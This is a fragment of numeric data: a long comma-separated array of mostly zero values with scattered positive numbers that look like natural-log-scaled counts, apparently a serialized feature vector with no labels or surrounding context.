0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 4.276666119016055, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.4849066497880004, 3.784189633918261, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 3.0841946160253877, 0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 3.0841946160253872, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0, 0.0,\n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 5.769774563315189, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 4.127134385045092, 0, 0.0, 0, 0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0,\n 0.0, 0.0, 2.550898738446989, 5.46286043483228, 0, 0.0, \n 3.295836866004329, 1.0986122886681098, 0, 0, 0, 0.0, 2.9444389791664403,\n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 2.4849066497880004, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.828313737302301, 0, 4.828313737302301, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0, 6.198469360840316, \n 9.129638369467537, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.4825185607408002, 5.723585101952381, 0.0, 0.0, 2.550898738446989, 0.0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 5.346437018291705, \n 4.490536906871891, 0.0, 5.375278407684165, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, \n 6.711235389328078, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 2.9444389791664403, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0, 0.0, \n 2.6390573296152584, 0, 0.0, 1.6094379124341003, 0, 1.6094379124341003, \n 0, 0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 3.0841946160253872, 0.0, \n 0.0, 4.06534854782536, 5.1298987149230735, 0, 0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.007333185232471, 0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, \n 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 4.631631038266565, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.346437018291705, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.8903717578961645, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, \n 2.550898738446989, 0.0, 0.0, 1.791759469228055, 0, 0.6931471805599453, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, \n 0, 3.6888794541139363, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0, \n 0.0, 2.302585092994046, 0.0, 2.772588722239781, 0.0, 0.0, \n 4.292158018817389, 0.0, 0.0, 0.0, 2.4849066497880004, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8903717578961645, 0, 0, \n 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, \n 2.6390573296152584, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, \n 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 6.884768704067333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0, 3.9318256327243257, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 